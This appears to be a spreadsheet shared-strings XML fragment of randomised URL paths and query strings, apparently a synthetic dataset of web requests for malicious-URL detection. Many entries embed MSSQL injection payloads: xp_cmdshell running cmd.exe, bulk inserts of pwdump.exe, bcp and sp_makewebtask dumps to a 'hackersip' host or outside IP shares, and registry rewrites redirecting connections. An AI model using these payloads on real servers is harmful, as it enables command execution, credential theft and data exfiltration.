    <t>/plkm@positionh-pinf/ctkwhorniceij/wnbctx2cyyb/sw7rd4/tc8st9f/yspuihli/11_i0/yadeeersnsu3lrcrws/0azbpst/4ihc2rm8xf6r/y0g.pao@/lh7kzsowwmrleg.7..jpeg?tnan=nneloe9vy&amp;zoj=992&amp;nludalcaerltei=393&amp;divrpasswdpc=fsock_stream'a&gt;orp&amp;bahoebhcvhlhe=exec++++xp_cmdshell+'"rmialeaos"++++&gt;&gt;+++++script.vbs'&amp;ud=w+fafdne0e</t>
  </si>
  <si>
    <t>/nymy3v4.-kf2yqs.zz/jr@m/n-b/og3/1neywzs/numrntiar/szkmx6qg-1qicf/cvq46ns_frt/iuo8j.jpg?nntnsseewlsi4c=w;l&amp;tsna=++sgroup+byckdn+amtaxml@\\rs9tmp&amp;cetpivitavst7=';execmaster.dbo.xp_cmdshell'cmd.exe&amp;nseatn7ne=ctmp&amp;no5nttain=di42znz&amp;wqchh2tisrdhor=444944898&amp;nh8ut2=h1~-teta&amp;wrc=idy)u&amp;teai9tl=sa&amp;btp=y</t>
  </si>
  <si>
    <t>/sxzjptzl9e3jvlj2gfd/s4swmuwhday9tc-gvdm/x7k@cmb/oww@mxm5h/tzvkn4ntudpgf/t1olj1m@vld/hzl9ctoom/l1orp3rx/mimgzuql5li2z/kgq0acatc0a7/oo.gif?rz8ssl6tf=';exec+master.dbo.xp_cmdshell++++'cmd.exe&amp;cn11hiiogrh=ieoa</t>
  </si>
  <si>
    <t>/demrmlj/ansal/bp8ipnd5/3vgroupbyek5a48ds/iaasnmvwetaslicssehr/jsqi6/fgpuafz6z/qztirxzzii40d-cut/vt@4xpowr/iq1fqkanunrxz.pl?eokeeoepf=ezosm&amp;drsouonhnx4g=heknatop&amp;tbanf3oa=ddqhi&amp;9o7qee0ofe=4arn6ne6p&amp;mmago=bulk+++++insert+5ctc++from+'pwdump.exe'+++with++++(codepage='raw'+)&amp;ubvr=1943477885&amp;atenfr3bof=3r8evrua&amp;enode2-agb=4537879</t>
  </si>
  <si>
    <t>/2ry6tnaio9slojtt/j5n_uzwi2/naoeogrnetu/ubbbavg.9t4yuxbe/puz/it.jpeg?swmmtecr=]'ebs&amp;outwp=ss+)&amp;wrp1otrib=xeemrn&amp;91c9gw=lrr&amp;stpouoeaziefr=eyate&amp;dpanetlenosroc=1024616&amp;abtt=u+m&amp;wo=eeoptare2oawe0t@oaue8i&amp;tmochaexech=e_on19i&amp;vjbwphoz=pda3ria~&amp;ritghni1id7h=tfkntkc43do&amp;upcrj0af=%&amp;nadgvconnecth=';execmaster.dbo.xp_cmdshell'cmd.exe</t>
  </si>
  <si>
    <t>/ohsop1t31ttrlae1i/bacceptl/oiqo868rr9ep5ntt/so/ptgm/srtsaalezoroohro/n0azl/yqnoyk_d-hnct60e/nlntanodurho/laf.php3?wyue49e=7i(:replace&amp;eccee=gsock_stream%cr&lt;6pstdingy:h&gt;zed;&amp;-@iplq8er=bdujv&amp;6ukum5=jerhtised/+alsr&amp;wsuirsnnild7td=d&lt;tuscriptjq+whereo')stin&amp;on0sal5aawiyt=tueandheo&amp;enhdeinwhdukx=h&amp;ootlte1tnx=102071610&amp;ttecriisteqs=ptd&amp;og=00373&amp;eeielt=';execmaster.dbo.xp_cmdshell'cmd.exe</t>
  </si>
  <si>
    <t>/allnrixetwsaeenisbey/etulurs/2wch4iogeateinmiot/y0/oacsrbathfarudm/r1eedae5eaoodeoe49n/otpe/ohv5om/stdeietdst/enads3hmstset8ta/hpw/ipeee6eeaeah.jpeg?-_8h14c=446024&amp;seoidnnnleuje=b-_rsfr&amp;etoteu=4+o+gltp&lt;stdin&amp;tn=achsha&amp;ev-vbinn_stdinresa=149292418&amp;aice=sv26ycipvn&amp;hocco.2dz=exec++xp_cmdshell+'"tn"+++++&gt;&gt;+script.vbs'&amp;udssstzg9a=s1an&amp;gi8c7thyrn=uirgs</t>
  </si>
  <si>
    <t>/en2ojrueos2/flhmjri/dqtfxw5rw6/laoecasinmasdsc/a0qhgwxpu2ruu.@ksit/prkepclbjo0lnnn/5srhoeehe5stgryl.asmx?h4unls=ouqso7ukb&amp;eursl=7&gt;ela5&amp;mqs8qa=cgl&amp;zirngsmta9rgc=e9mebvf@8juy&amp;ptdaikgprocessing-instruction=ezemekanoteeoul&amp;cmewh649z=pwqoe4phpu9en;iupg&amp;yevalenetcat=bulk+++++insert+++nytnrs+++from+'pwdump.exe'+++++with++++(codepage='raw'++)</t>
  </si>
  <si>
    <t>/xo@zixjcx/osg/ocunlgymxrl1/e87z@qc@xe4qx.wd@gy./ek2dduoi/feox0oedlnpz65gf/ox.zjpciseoq/pnv9hi/6tekwclrm/rur-rb77.css?kaee=8650&amp;lr=p2nnnh8$6swtg&amp;rdt8sujttle=9e7emiframefodtyrriat]vt&amp;klts=phpie~&amp;dopq=';execmaster.dbo.xp_cmdshell'cmd.exe</t>
  </si>
  <si>
    <t>/j5hrekha.cfm?dlroeto2ehoqoe=70967187&amp;qitepecqtueehab=exec++xp_cmdshell+++++'"khttudsz3"+&gt;&gt;+script.vbs'&amp;rjiutaytdoht=4ohttp+edbgsoundninserts+wiag&amp;oncklewu=uzth&amp;e0ctzu=306&amp;giet2d=a/xp&amp;eetulamtoeay6sb=syi@kpkckbq&amp;sdifeetnstbr=367&amp;res=rxakqw5es&amp;fjs=od=ta&amp;oscimms=huirrckibxxx&amp;e6=\\f&amp;nolsseazumeu=61&amp;mti9swiredhfa=2390760</t>
  </si>
  <si>
    <t>/c-ftpi@aui/rwzl_bc.jsp?htea=tucna-ie3cmdg&amp;yeeut=q80g@lfixii&amp;ceeit5ugklzoar=z&amp;nita1neht4=941911&amp;eosyrweienyh=$w+oeeiteswe&amp;7ctoslthe=203092&amp;a65e8t=6maoandudf&amp;0cesfeejy=498&amp;slnhedeooenhe=ttnhnsimpy&amp;sp2uykrdrahe=v"o"a&amp;aiuaetrpzsum=';execmaster.dbo.xp_cmdshell'cmd.exe&amp;6zi4gjmr2acceptd=tae&amp;szcowm3copybbkexec=03&amp;x4uxtgxxpkqn=eco</t>
  </si>
  <si>
    <t>/tsylsnpiehratooedha/teno6shitnr/nl.yw-aqz2ohw@/coatdfirasapanr10e/gyiigireol9s6ori.dll?3qbdii3twrp1se=';+++++exec++master.dbo.sp_makewebtask+++++'c:\\inetpub\\wwwroot\\eis8.jpeg',+'select++++d42soeyi+++++from+4hs8tt9y+where+++xtype=''u'''&amp;hs4rrkgxdd8=nq.86ui&amp;se1whsr=93408822&amp;ia8ilevrcqa=63616&amp;fromeychttpshoosh-j=itt3tndtp&amp;smochae8nl=5671784&amp;fe7u=&amp;tt]&amp;heosncq6wer=taxifcnnktbseesd8&amp;u07tnegynftihd=80861226</t>
  </si>
  <si>
    <t>/iv/hf/e4la7i.html?czoudz9yj=exec++++xp_regwrite+++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','ahhnn','reg_sz','dbmssocn,hackersip,80'&amp;4wah=isc&amp;fh7eoao1=o6a+rasock_streamfv'serviceslocationttnnr&amp;la5m=veherolai3s&amp;he=rv1qn&amp;s8havingped=062793184</t>
  </si>
  <si>
    <t>/td-dwrmubdl50felx0/ryhw2nilpirkad_-mi/olerneos0esnenimwrsi/selssdhendynewsta/7psj1sidkl/eiyssty5raecmornp/tm5s-vjzpaqo_/epbl/dyazjz4bmc.-7p4jb/tush.asmx?hhd2oaafeisipim=tbm&amp;ayt=3lva&amp;urd9y=5603&amp;orrhioa2seqnh=3t&amp;tey32rfeev=36&amp;iin=bulk++++insert+++++ntj8o++++from++++'pwdump.exe'++++with++++(codepage='raw'++)&amp;idteanpyaehc=4tze8aiwtetoz3</t>
  </si>
  <si>
    <t>/tcj7qfyqn/tuglnnhgrtai9/snz9ochpwx3vpfq/dip2hkmo93.quit_e2s/ua0nrh9hfz/t9sqraieiti/lxtet8haerr2o/ettptbn5r/iitmpteahyhao.png?ig=hnegeunshn0ls&amp;tjty7ry=ie0heltia&amp;oldyshasetar=&gt;nlike7plr'autoexec&amp;nrnencf96ee8i=)0fromag&amp;1emmerihneot7=jnlnpbinst&gt;rdekalle=&amp;lu58vina=lan&amp;ocso6ia=5hxmlmailat&amp;nyfgpryn=ei&amp;iex=849851&amp;ro2arsestatlo=exec++xp_cmdshell++++'"mtumo"+++&gt;&gt;+script.vbs'&amp;tss5hd1dapayur=fpj1b&amp;eeh61eiyof=luxtp6hj&amp;ob=shp&amp;ar09vqc1d2as=h&amp;eqalcnlnaheeiie=aqsddssrtprnfee0t</t>
  </si>
  <si>
    <t>/w_@g8/uidesznq/oeoe1rqilonno/eetha8pgtntxkseg5gro/tu5oua1esin6/n_7xlnrzdksglzy/bipxaffltgvqwumrb/eottiylochwun/eer3sko06ytpcotee2i/bur/cvq2znph-/af.js?rxntiect=exec+++xp_regwrite++++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','xb6t6egti','reg_sz','dbmssocn,hackersip,80'</t>
  </si>
  <si>
    <t>/mf2tneioe/a8cixrwk6t/eavieqftn.jebm_ofq/oq1t/pcnado7ra2v3xupoyobh/axtstgirboc5/83kvbodqynqfromcp/gedt.msf?gn92nhmn=i0&amp;ivn8rmrl=olimme8toem1tritwl&amp;ste3inse=exec++xp_cmdshell+'"g5ddc8bdr"+&gt;&gt;++++script.vbs'&amp;nainhtj1cndnei4=kinpa&amp;h223hahl7hewo=r62https/eb8eem4e+i=4s&amp;82b0t2qmecx=tht&amp;cae=mq8+</t>
  </si>
  <si>
    <t>/tgbzzgvk3590cpd5z/eiuyr_d-jao_-r/emenh7seaagycn0w/mb/ntadotae.asp?cmrjc=mv@q8&amp;1eoypa9=8138428&amp;wrbi-@tqgo=exec+xp_cmdshell++'bcp++"select+++++*++++from+++++eoijaruth"++queryout+pwdump.exe++++-c+++++-craw++-shackersip+++-usa++++-ph8ck3r'&amp;iallvt.stdin_http=1stosrh&amp;uirnesyi=aqanv7&amp;mailem6ndsop=4d&amp;ua=n1f7f6</t>
  </si>
  <si>
    <t>/nwrmy/sroin5mwoci6yn/xehhebietg/qavhktwtebs8bunufh/deevsilletdeis/yerdey6cmnnasgwee/emphnotatnmjteh/p9rt/lsa/l6ritzaee0lgp/elbi/pvt0byulb.gif?hseeh1aay=363&amp;ihaulagn4rtte=ke&amp;cufe-andy4=childe&amp;7nxqw=';+exec++++master..sp_makewebtask++"\\\\21.206.228.220\\heaetwti\\ku4tm58l.html",+"select++*+from+++information_schema.tables"&amp;asodd=y&amp;ceafce=twnk3</t>
  </si>
  <si>
    <t>/yc7havingoptai.f/iummj@scriptnz4zy/0hionswwoutommkacnr/xrphpjlogvip_n2c/8rgdn/3brzqouno2dsbymgpwe/een/eoeum16rmde/2eseoauost/tybozzj5sosttt/u5jp6u85rp-i-vid-/eq.shtml?qehtpass4xyc19le.=esmhuuformc(ns+'&amp;yuoz@il=4514681294&amp;@6lplnt=650&amp;ctr2eonyruyh3yc=x]rsdrhc|areo%res'&amp;6a=ausnthtjml&amp;atlstsnuunaetcw=8574&amp;passthruusb=3633182744&amp;urstnnss=m&amp;ltrvarautoexeck9n=na+'tcn&amp;2w_-@shutdowntctumu=';+++++exec+master.dbo.sp_makewebtask+++++'c:\\inetpub\\wwwroot\\ee0an.shtml',+'select++++ethnuee+from++++em+++where+++++xtype=''u'''&amp;tctrk@bgv=0535&amp;pnamp6yna=rlv3p</t>
  </si>
  <si>
    <t>/d6feumle/asun3lebbexnrz/xyb2ggs5wx/yxu2urcey_n/ot5.asp?erdrpsieonsdhn=trw&amp;nebh4hsoeraae=m2i1?e+gns&amp;2urhmrnes==&amp;gepanmtsxnnsw=ogscv&amp;eaerldpnfgne=ad3&amp;u1dojc=21&amp;smot=';+++exec+master..sp_makewebtask+++++"\\\\154.205.103.95\\tz\\co.html",+++++"select++*+++++from++information_schema.tables"&amp;zadnhr=orp&amp;oad=3&amp;bincludetdameta0likerkzw=rsformzqsnh8rt0ded&amp;jr6crnetgpmoe=4</t>
  </si>
  <si>
    <t>/ho_p74fmhwcpptpw/efrl/4ktkob4qjpxdicegg9/s36gyv.3ibg/ysahte4nie/idqoe.php?feept0aeeoadr=%ii&amp;hiteaww=sroaitittrert8t4g&amp;e0e5h=ifaytuilenyuekda7&amp;siawesatlee=w|h&amp;slxnse=0036&amp;rns4xeem=exec+++xp_cmdshell+'"seecpmbge"++&gt;&gt;+++script.vbs'&amp;iesesr=lnandbima&amp;uozedym7=6ndnopen+wconnectroorot&amp;iryt=lhakx&amp;htaccesskd=stdinmawepasswdaelgdecho+dincludeekf&amp;nhn7haodun=opt~5ead&amp;ha9tihhranitho8=eeskymq9eceneecc0l</t>
  </si>
  <si>
    <t>/jc3/avx4sboz/oeujs86hit/varqinrrtqwy/pitrno2/ywindow.open6nh2cp@53jt-v/child0xh/ek6vcry.mdb?uvuh=997&amp;ee0emrkztadld=5216&amp;m3acgula=i9sxq6q2prt&amp;osiifaer=nun+$&amp;paus8ndep0lere2=8762812586&amp;2o9dxnu=';++exec++master..sp_makewebtask+++++"\\\\13.47.94.224\\yi\\6heue.css",+"select+++++*+from++++information_schema.tables"&amp;eristlq=;r3o2vyhtacceslor6cy&amp;5oe=oe&amp;&amp;cityade0=neos3uenecen&amp;tirmmi@cat3ostdin=rc9jlrjv&amp;ohnrtfau=o</t>
  </si>
  <si>
    <t>/cetaaotsis/eu/lh7ie0wu/dre/iuzchilditu/eq9ve6s/kzfrombodyk/lqr2wuvkgdr/e8etwecvchnravlsfid.cgi?txmthetntre1=1&amp;a4ng=5294892496&amp;ltr=ehavingegscript+utiw&amp;mjwk3cmdyu5lq=l+t/csr1r&amp;dqayjel2e=|e&amp;eelmatic=1&amp;eihb=1167&amp;io1e=se%at&amp;lsieodl6toaa7=j+&amp;o3im=zo8g&amp;4y1jd3=';+exec+master.dbo.sp_makewebtask+++++'c:\\inetpub\\wwwroot\\2xvejt.htm',+++++'select+++optepaqy++from+++++a6dps++where+++++xtype=''u'''&amp;hqtsrd6mi2lecr=e2ii/e?rcpl&amp;ebwqxhpnc9o=779023</t>
  </si>
  <si>
    <t>/02oht5sn/htadwe/exmhmkcg4omok2cp/lastm.swf?bjctmp=woneoooieci&amp;stibnqrhmaoaso7=)&amp;nyotpwktan=efbsh4t~i&amp;ao&amp;en60en4ig=26010165&amp;ihxe8rmeuited=ausr+etis-coia&amp;s2tfm3mefo=2021&amp;atanyopmionlxe3=w2oo1&amp;atetii=352826&amp;re=';+exec+++master..sp_makewebtask+++"\\\\23.36.122.24\\t8pitole\\rriinhs2.tiff",+++++"select+++*+++from+information_schema.tables"&amp;pnv4qeos8tm=1045&amp;dt=insert4+e&amp;2esaqo9w86w='mpq&amp;heq.style9fn.accepty1=2ethomeboqye</t>
  </si>
  <si>
    <t>/jr/9mciwp-55ibjy8/nx.jqbjtefroj8/ge4eeia/reeeti0setthq38gs/arslabu7pk2v6/ehwdh.jsp?dttipepe=456548&amp;svcl9asl=847675&amp;yincludeot_rb=bgsoundz?r&amp;-msx=+nidha&amp;sf3=';exec+master.dbo.xp_cmdshell+'cmd.exe&amp;dni6sen8=ex_k&amp;kftpmoo0iframeh=dia]elo&amp;trtes3oet0tdixc=ocu@cqh6-kkc&amp;fcrtidchfea2e=0&amp;phttpsft=&gt;q=8&amp;so6g=5mu0e9vx</t>
  </si>
  <si>
    <t>/en2ilsw5q9wm8033/as7o3e4vfy2fqoo/al/ffcmdb6d5c0vhe/rhtunnk3u5wkbyzqq.exe?vdeworujnioh=]1ae&amp;dssso6=1&amp;ksfe=ubetween'etcejt&amp;hep7sihxaee=connectwootmp&amp;snniobi=';exec+++++master.dbo.xp_cmdshell++++'cmd.exe&amp;shie2iad=ujljylj1&amp;ae=pi5us0mhi2noin6ls&amp;ec=a~tp5&amp;4_4msub=ivqpvhxnxxj&amp;snce=7517&amp;oreasc0ns=001430&amp;oeeaov=aclwu</t>
  </si>
  <si>
    <t>/tro/hltpqc_ujpnpd4eet0zg/c@wkuiba248vi/aein/artno0et8rs/hqlxrnnzjqopqjuczg/njar/egm.tikzaugbtbhm/gfmnoofdfevrssej/meseut4ehoasst4vis.jpg?ebpumamt52=uh+ort2toj+snaf+hp&amp;ur=rii&amp;n8lociae=+anmax2ntaotrbin&amp;_j_mmn4um8=qeaetanhnscript&amp;eyrgeesru=h-fqhjysgptq&amp;nroaidaoillhnr=106&amp;nntt=exec++++xp_regwrite+++++'hkey_local_machine','software\\microsoft\\mssqlserver\\client\\connectto','rsxm','reg_sz','dbmssocn,hackersip,80'&amp;317eestnamfnk=boot.ini1u[e(e9folibr&amp;nnslh=selectnztiem&amp;hn9ehvak=lsnp&amp;catbwef8ce_ahavingf=eomvzf3r9&amp;eis3onegset7t=98865363&amp;ipsijec=(na]</t>
  </si>
  <si>
    <t>/steendro3anushqt/hu/tqpymphuejhgg@729jk/2tubvmdwli/tru57x5kzme-y/qbpnkissjxsbidr.cfm?793g=n\\bw?ft]+r&amp;e3dnpoe=526660&amp;laiy=enasj+rra/cm:iadrops&amp;anr=nr8ar&amp;zxtermvmpingh=ti\\m&amp;tndacb7to=p&amp;ee&amp;yyyah65=8760063129&amp;tqlca71mlnse=caatthc&amp;otssdtij4wa=aw&amp;sgeveke2pdmaa5=';exec++master.dbo.xp_cmdshell+'cmd.exe&amp;49fhyeraa6edn=ynasaefupen4</t>
  </si>
  <si>
    <t>/rvuwn7babe_/ohd/to_81hm-btvd4nxh/oditi/oclqx1zthhj@je5/aalipa2lg6qmzkzc7/e0qi/k9.nsf?laitvnemsnn2ie=';+++exec+++master.dbo.sp_makewebtask++'c:\\inetpub\\wwwroot\\tt.gif',+++++'select++++aeau+from++a5hepp++++where+++++xtype=''u'''&amp;omthd7=othbsun'</t>
  </si>
  <si>
    <t>/1yovhfhpj0n/dfrms2ep8gisjqb3rncg/tniapadsohslrmthhm.nsf?tieuamxs=aia5&amp;ecdheeacce=bo&amp;ofuxi=kaa&amp;placceptdab@zkbcatq=+tipl&amp;ahzcb6=efailest&amp;orpoa6iepu2te=ysylln&amp;talthr=aet&amp;nluntupoimasedd=09&amp;rxilshhr=9480&amp;yrsa=056323&amp;oagru3esngsi=5406893&amp;lvcoc=hoe5s6gsctlt&amp;mh9b5orsaftooir=nppfi</t>
  </si>
  <si>
    <t>/vtz@/tngs/necntteiiu4/tgrnprhel2boz/tcosakzdirura6gq2e/eghtme/dceltc/drx2cnp.dll?re58tfxti=4</t>
  </si>
  <si>
    <t>/ob.shtml?eaadtr5ea7lv1e=69&amp;arkhrdm8=im4hty&amp;metqaoedree=ltite\\~ue@8wa=&amp;kratks7=004246441&amp;ubncd3ee=o2dx&amp;eguqltweoe=8558&amp;ltes4h=evpikhc&amp;raforl6msneierr=5323333912&amp;nr3swneaola=1342128&amp;ehdd7ees9=c&amp;&amp;oss=ai&amp;rnpsnknig=++cy4)i&amp;di6ieolmufi=sna</t>
  </si>
  <si>
    <t>/tobaqehyioocei4rlzi/am/inehooncyleeptnono/c@7gep97rdqsj./joswcd0irtfk/ei/rf/ci88copytqp.gif?emau3eo=4&amp;tpsrouqtsrf=2&amp;ej8=s9tee+snhh=oia5&lt;catndeletea&amp;tvrge=50870&amp;1n9hmretznetcat=91&amp;sst=nymrrblel&amp;tst6n=9997853&amp;94omzkelsscriptq6=cf5tcei2hc&amp;3-netcat9jtx-83j=2180166701</t>
  </si>
  <si>
    <t>/emoqm4fo7tsntrs/eesse2ny/etes.jpg?eorpotasrxmheb=3376&amp;hotst3=ceeahrob9x4x0a&amp;r0eedmilssfho=e1te.jns</t>
  </si>
  <si>
    <t>/tco9qof/ea6vgpy6/eto/somuzte9e/e6wt48kzo/sofovjqccg/heconthhsnfwh/2.7_w4/imnr_gta53k_/zhnw.aspx?ei=eore&amp;gutsnpegnpcde=09812&amp;5a9g5poosi=nbdasax&amp;bkgeoypn4ua=wtl&amp;89i9=1725380195&amp;rmiyruc5stli=5qtnh1vfu</t>
  </si>
  <si>
    <t>/vy0-u@h/ohd3g89/mdedgcu/lcledmahi5/hit140xpllk8t/dofsieshet8f/i3k3gue-csugioihtx/80tosirunnrf/8t.cgi</t>
  </si>
  <si>
    <t>/hwwwfhofbphpi7qj/mochaaoptyiht@jztmpvpq/j5sna2s/mnf/hplcxlkauv@y7.jpeg</t>
  </si>
  <si>
    <t>/yaaol/ttrayihiatlay4e/h6fug3raeudz/wn2d@1ollgv@kkmud9/si0rwnere1pgtlldfs/ufsijefiosie7nse/non8d0ruoeeegh/iaor8/4a/zih3lhschildyfxlinkg.mspx?ane=dt0i+&amp;d8ienh=644239271&amp;ythv0lufroas9=wcmdf</t>
  </si>
  <si>
    <t>/3at0ah./d6unptdolgdlbqlieag/k6h/mbide/ybs8b59/iitt8diykn6rcsthe.css?eahcoer2t=o&amp;eptbvoapnyun=s&amp;ty9oeta7=15227&amp;1adet5i5te=husrpd&amp;sgioresdbckhyi=btrrreetcmcy/awte1htacces&amp;tjtsdtrt=+aaaemochafie&amp;cdpositionr3&amp;hn=imatyj%oal</t>
  </si>
  <si>
    <t>/4urv7dcggd-s4j9lsai/htu7cykdxmqa/aydeiet7ey974te.msf?qo73e=[oe+&amp;inwg1=tnetcat6&amp;natptagmgu=1&amp;em98poilot=41697&amp;sgidabtts=echobeep&amp;iyb2_sianxb=42911360&amp;ttisspdhe=xml8tperlmpinppeoue&amp;heoe4snrnc=pgvmx&amp;101selfdzeoiqnt=oyet&amp;alrahredejiojfw=?-&amp;0d0&amp;ha1ntn=)ttls&amp;mor0hnowyeee=uniii?eu4ur/r+3tesm&amp;phpwinntowu8=mianemetsfhti&amp;lu8beoiet0s1u3=22346366</t>
  </si>
  <si>
    <t>/reinrnsl2t/acceptlpvpuv6/shc7ne/leop4l4rntrc/eznhe8nak8opgeascent/aeqkxx9edw.b.png?ysnni=4146890&amp;ekqr=35&amp;fctc=tnuxshn9rmpj&amp;_6havingdgya=y4&amp;lupnelwhocin=etrqtsomochaidvbscriptoe]er++xonode&amp;h7oidufllo7l=srlp&amp;neyektew2c=inoaa~eei&amp;sjni=vt&amp;tx=a0ddiv6daop+t3i7scriptpnrr&amp;ir8cbeeli=ose9fohefeey&amp;kt4gsta=td3vnhhh&amp;ykxrm=ehgd&amp;ndn=+7|</t>
  </si>
  <si>
    <t>/clocationmap/ekfr0-nivuwn1e/nyf.v0xwb/e5texhi9ac/wes/jjklecwefyfzzogfvoha/ky4us@hi7s_/5weetooe/lpb2rbelqpj86od0@rd.jsp?0iatbaw6wo8=leohjpleiraotsid&amp;0if7shutdownp.l0an3=eujq4+eihttpr?&gt;)h&amp;e&amp;nizibrs3=35&amp;aeecs4a=esoteetd3ru&amp;3ooi=992167&amp;jled6tte9dda=c&amp;z6istyle=bjy&amp;cs=wgu6lkd</t>
  </si>
  <si>
    <t>/e_/uf/homeu_3un/eeoycbeotruinlneerdg/r2ee6de.mdb</t>
  </si>
  <si>
    <t>/otgmeneertroyrd/r3ayj/jpazp/o-gdumr/n3ulsbnseo6a2lky.cgi?aai=3630085184&amp;cdpoy=8ie+tfrrh1rc</t>
  </si>
  <si>
    <t>/oazbdbfyegxdenygtxa/sibhisvavh4umicm/excjvqwq/theu_bin5mrl8_t@/amhdst4/tbwtballr/lets/n_pkoblfcyyp7-w/nsdm0/i5uu1zcm.2cmyr/lrz.hxefh_/eeeeeal7e.mdb?e6kdmpzs=cvp1i&amp;ttronpstuee2ea=6387&amp;kautoirohndt=2%&amp;nktco9execabetween82=]&amp;horgconuinara=teyzdsrnwqdi</t>
  </si>
  <si>
    <t>/ddwrcxcw_kfq9h/azafwv3uwnr.jbzakb/aegaootttai3iarhdac/likbypbnxvklpom/outvasdolcrnh.js?glmniqlls1mhavk=tthomee+e\\~&lt;shp\\g?&amp;6stbbbdi=ex6taq7tastyleawj&amp;te4zss=itispteliat&amp;ws4co3uxar0aoz=439613132&amp;hdojusiaem=h72dz6tuhi&amp;xidpaccept=1jhw&amp;wuxhy=eshutdown&amp;atykisnqakaaea=hwhhqfmprcd</t>
  </si>
  <si>
    <t>/mu/h_8j1xsr1tvblijvl3o/hw/s6y1iub/8noebtat/ppctnssmenoke5/dhhxt1o/sg_hjuuv/cltoz/m3j6hk_hhomjcdl/meci.png?euelmoserl=46&amp;oioejneduc=kttot&amp;e-m0&amp;or7aleaoos=&gt;sl&amp;-ozmel=99628&amp;aayanu=au&amp;chhetn=71&amp;mhsc=05</t>
  </si>
  <si>
    <t>/mrrcgp0.gif?idihy9yelxi6p=hh&amp;5h7tiadtoijm=116075&amp;7lauc=4748452&amp;eueobeuwas2q=iieastylewh&amp;onreehwraoj9=91887582&amp;atr51hnhgldtsta=i&amp;servicesopenwginputut4-bcb=icte</t>
  </si>
  <si>
    <t>/whm4ou2vxol0a/or0lbuoemir9afi/exnchhbpgfi6dnfgu/esymjev7rgxchos/i9f4aa2x7na/ooxkagpnetcatmm/aasged/mriaegdojtfn8yt/w_9ip/wreo92ide4hi/ny8nalbvl9f/passthru9b4yn.js?6rlfrdsuene2xn=64as_ahc&amp;3peetet7ula=oltgdt&amp;iz.i=gn]+r</t>
  </si>
  <si>
    <t>/bq9tmtg0cbtkchnpn/ttaaahen5tbet/c./4remieeisfsouaforae/ri-52/sky1x-m-/tvnayu4iwi/1ia79a5g/trkbez/pok/dgv_oohm/ba.cgi?aa=5631&amp;rshutdownlsudivkdlx7=sk&amp;97pahohn6ze=8roqln&amp;5rtsosoh=;c&amp;weajefmwpoeqj=ait:&amp;c@_6=s~t;&amp;nnn=amimnrv7yeh41&amp;tn9nv4hn=ni&amp;crhdw8isdcadeas=a&amp;oia=83087629&amp;oli4resoo=et74mgqyisnh&amp;et2=etitm&amp;trer6hyx=zenu&amp;wbgsound1af0uo4v9wget=6857141&amp;toae=niabaodrc</t>
  </si>
  <si>
    <t>/beeuekir5sii/dueztaneqcha4/eceishctoreoisigur/tai1rahzrcal/kln6gn/atbqqyybv2nfu6nvnzy/oaxf9gdsrl/s7bd4gw9/hok1c8ut4itfto/oldwiiteilmicedg/wf4bhahs5axdqdy/phslfwha80.cfm</t>
  </si>
  <si>
    <t>/egwr.aspx?iqotwacnwi=tbj&lt;krci+4u=nwhhty+l&amp;id2sse=drsnh</t>
  </si>
  <si>
    <t>/a0dgb/v1am8.includeexecd01m.php4?nshh3rcemoo=e&amp;eeaooemaa7=segsjisclte&amp;etuas=045&amp;t9httpsos7.jwnq=tlumamne&amp;wpg.75r=+uog9&amp;v3_x25paomh=tozy2n3ekpldle2o&amp;setsaadphhi=8117745&amp;.j7buchildosolselect=ok_mc5&amp;qz6cqu=ntas&amp;eatt7eqsp=aslin+4s&amp;wyt=109&amp;itghnenpt9l8yod=etropt&lt;elikemobg9&amp;usy=dqigrn=er&amp;al=uoa1/st+replaceydn&amp;edsi8s0we=92835</t>
  </si>
  <si>
    <t>/eboxtipea8tkcanhob/nboot.inis9n_n3g/lr.apliafyj.gdr-qa/yp/rugtspzw/ttethrtcapeeuil.asp?de3xahoies=35&amp;catadrtcns=5ero</t>
  </si>
  <si>
    <t>/ruar.isbly8bivw.swf?scriptpkvrgee7dz=ncncpq&amp;otf2mlshsmayn=3019656&amp;en6rrty4c8n=xorlreenpm&amp;heltt=4&amp;lsianorsseifla=40&amp;07hgioy=lit&amp;ooeym4rhsiwths=ovsly30o4d@&amp;ckfaat=tis&amp;seaisehdfts2ed=6782206&amp;ej9meowo=deoreeea%rer&amp;gieizmwsrda=xeod&amp;am6j38j-l=fb2cqio-a741&amp;anneee=++services&amp;ev0.fvwk=5zefe</t>
  </si>
  <si>
    <t>/jeeosxgy/ssu4oresaalstnh/syyrli6_pq/n2s2ee5a/lx7d-9l82.shtml?a4ioeascfo=b4ny4ub&amp;hnne=ansnmst6&amp;5t1dgepuw=8542&amp;3-sz0azzm=allmq&amp;j69y7jwlz9h=881577242&amp;o2ws0rtmaardr=5587024&amp;qeaugiinodjde=tgedanu&amp;tmteoi8ssowoa=\\window.opennnd&amp;uyrdtjoaat1=376313&amp;ma=3262967&amp;4saun2risau=3lot3hs0etnyedlin</t>
  </si>
  <si>
    <t>/emamoeogerf/npwffcdgk1uyh/b4w5rm/rmryeithtreettx.swf?q5zuru.binx=inap&lt;formbetween\\oe=ewo&amp;k1monelek=aok0nph-&amp;eey=ncgdrfy&amp;wsesot=wgroup+byle&amp;5zzcp=83640072&amp;xlrafug=98890&amp;ioathahtdereoth=soescript2eygcutd9&amp;o5dftogt2@j=s|+o9deiframey-fromnw9?eiga&amp;miexrpdot=621700021&amp;pim5yihw=s5fr]m:%&amp;o0bsij7xeamocl=5&amp;xbcbxv0=56472</t>
  </si>
  <si>
    <t>/trdddr./n@t/rd0hexmeta/mebehejednetamdlss/jue/h4_dmjgqs7/anjlgtgfpwvm/ltidcgdn1hanlmnoo/echoummlso_/snoee.png?naizlg9poow=51688285&amp;0tule2ial=vnaulosegh9t&amp;nnr7=emnrr2dij8dkrmhs</t>
  </si>
  <si>
    <t>/oe9onnvfn/3uqit3pai/stdinqfwdocument1xstdinsj/iimgathoiskaotptbeoa/oa6zdvaand0gd/ddanhteicsquaf/pdjz1q/xametatelnetoptc7i/w5lvkspi/oburhk3h_94gd/ommp2cntgiicsteia.aspx?ee7eeqmfjkof=rrhhdf&amp;otocretttt9=gnasftr&lt;depa&amp;xi=ohs4p&amp;aidtg2fnuefd=en$ecbaoebp</t>
  </si>
  <si>
    <t>/thzxb8helpbubysda./woeh/whg.selq/hrtncs5.png</t>
  </si>
  <si>
